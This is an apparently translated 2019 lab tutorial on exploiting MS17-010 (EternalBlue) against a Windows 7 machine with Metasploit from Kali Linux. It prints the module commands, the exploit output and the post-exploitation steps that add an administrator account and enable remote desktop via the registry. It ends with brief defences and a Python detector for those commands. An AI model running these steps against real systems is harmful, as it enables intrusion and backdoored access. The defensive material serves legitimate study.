2019/4/18
This article covers using Kali Linux to exploit MS17-010 ("EternalBlue") against Windows 7, the remote login that follows,
and how to protect against it.
This article is for classroom experiments only, not for criminal use.
1, Introduction to "EternalBlue"
"EternalBlue" exploits an SMB vulnerability in Windows to obtain the highest system privileges.
The malicious code scans for Windows machines with file-sharing port 445 open and needs no action from the user:
as long as the machine is powered on and online, attackers can plant ransomware, remote-control trojans, cryptocurrency miners and other malicious programs on computers and servers.
2, Experimental environment preparation
(1) Port 445 is open by default on Windows 7
Having port 445 open makes it easy to reach shared folders and shared printers across the local area network
(2) Kali Linux and Windows 7 can ping each other, and the Windows 7 firewall is turned off
3, Carrying out the penetration attack
In Kali Linux, enter the msfconsole command to start Metasploit
msfconsole
Then search for the ms17-010 vulnerability
search ms17-010
Use the ms17-010 vulnerability scanning module
use auxiliary/scanner/smb/smb_ms17_010
Then look at the options
show options
Then set the target address
set rhosts 192.168.247.20
Look at the options again: the target address (the IP address of the Windows 7 machine) has now been set
show options
Now run the vulnerability scanning module
run
The scan reports that the host is likely vulnerable to MS17-010 and also shows the Windows 7 version information
192.168.247.20:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
Then enter back to return to the initial msfconsole prompt
back
Search for the ms17-010 vulnerability
search ms17-010
Use the "EternalBlue" exploit module
use exploit/windows/smb/ms17_010_eternalblue
Then look at the options
show options
Then set the target address
set rhosts 192.168.247.20
Look at the options again: the target address (the IP address of the Windows 7 machine) has now been set
show options
Now launch the exploit module
exploit
After the following output appears, press Enter
[+] 192.168.247.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.247.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.247.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
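This brings up the Windows 7 shell
Enter whoami to see which account is logged in
We find that we are logged in as the account with the highest privileges on the system. The attack is complete.
4, Attack: remote connection from Kali Linux to Windows 7
First check remote connections on Windows 7: they are not enabled.
We can use Kali Linux and MS17-010 to turn on remote connections, create a user of our own, and connect remotely.
First, we have already attacked successfully and entered the Windows 7 shell; then do the following:
Before starting, first fix a garbled-character problem
(1) Add a user named snp with the password snp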
net user snp snp /add
(2) Promote the user to administrator
net localgroup administrators snp /add
Check whether the administrators group now contains the user just added
net localgroup administrators
(3) Use the registry to turn on remote connections
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTsConnections /t REG_DWORD /d 00000000 /f
(4) In Kali Linux, connect remotely to Windows 7 with the user just added
Enter
rdesktop 192.168.247.20:3389
Then log in with the user account just added
Click Yes
When the following screen appears, wait for a while.
Then the remote connection is established
Security question: how to protect against this?
1, If you want to use the remote connection feature but are worried about being attacked, change the port number used for remote connections
Modify the remote connection port number in the Windows 7 registry
(1) Open the Registry
Press Windows + R and enter regedit
(2) Find path (1) and change 3389 to 4000
(3) Find path (2) and change 3389 to 4000 as well, then restart the computer.
2, When the system prompts for an update, install it, so that unscrupulous people cannot exploit the vulnerability to do illegal things and attack us
3, Turn on the firewall and close rarely used ports.
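On the detection side, each of the three changes made in section 4 (new local user, promotion to administrator, fDenyTSConnections set to 0) leaves a command line that process-creation logging (for example Windows event 4688 with command-line auditing) can record. The following Python is an added example, not part of the original article; the event format (host and cmdline fields), the host names and the sample records are constructed assumptions.

```python
import re
from collections import defaultdict

# Command-line patterns for the three changes made in section 4 of the article.
RULES = {
    "user_created": re.compile(r'\bnet1?(?:\.exe)?\s+user\s+(?P<acct>\S+)\s.*?/add\b', re.I),
    "admin_granted": re.compile(
        r'\bnet1?(?:\.exe)?\s+localgroup\s+"?administrators"?\s+(?P<acct>\S+)\s+/add\b', re.I),
    # The key may be quoted as a whole or written Terminal" "Server; the value must be zero.
    "rdp_enabled": re.compile(
        r'\breg(?:\.exe)?\s+add\s.*Terminal"?\s"?Server.*?/v\s+fDenyTSConnections\b.*?/d\s+0+(?:\s|$)', re.I),
}

SAMPLE_EVENTS = [  # constructed process-creation records, not real logs
    {"host": "WIN7-LAB", "cmdline": "net user snp snp /add"},
    {"host": "WIN7-LAB", "cmdline": "net localgroup administrators snp /add"},
    {"host": "WIN7-LAB", "cmdline": "net localgroup administrators"},
    {"host": "WIN7-LAB", "cmdline": r'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTsConnections /t REG_DWORD /d 00000000 /f'},
    {"host": "PC-02", "cmdline": "net user helpdesk Winter2019! /add"},
    {"host": "PC-03", "cmdline": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'},
]

def scan(events):
    """Return {host: {"hits": [(rule, account or None)], "backdoor_accounts": [...], "severity": str}}."""
    hits = defaultdict(list)
    for ev in events:
        for name, rx in RULES.items():
            m = rx.search(ev["cmdline"])
            if m:
                hits[ev["host"]].append((name, m.groupdict().get("acct")))
    report = {}
    for host, found in hits.items():
        created = {a.lower() for n, a in found if n == "user_created"}
        promoted = {a.lower() for n, a in found if n == "admin_granted"}
        backdoor = created & promoted  # same account both created and made administrator
        rdp = any(n == "rdp_enabled" for n, _ in found)
        severity = "critical" if backdoor and rdp else "high" if backdoor or rdp else "medium"
        report[host] = {"hits": found, "backdoor_accounts": sorted(backdoor), "severity": severity}
    return report

if __name__ == "__main__":
    for host, result in scan(SAMPLE_EVENTS).items():
        print(host, result["severity"], result["backdoor_accounts"])
```

Listing the administrators group or setting fDenyTSConnections to 1 does not match, so only hosts where an account was added or remote connections were switched on appear in the report.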
☺ OK, if you have any questions, please leave a comment to discuss.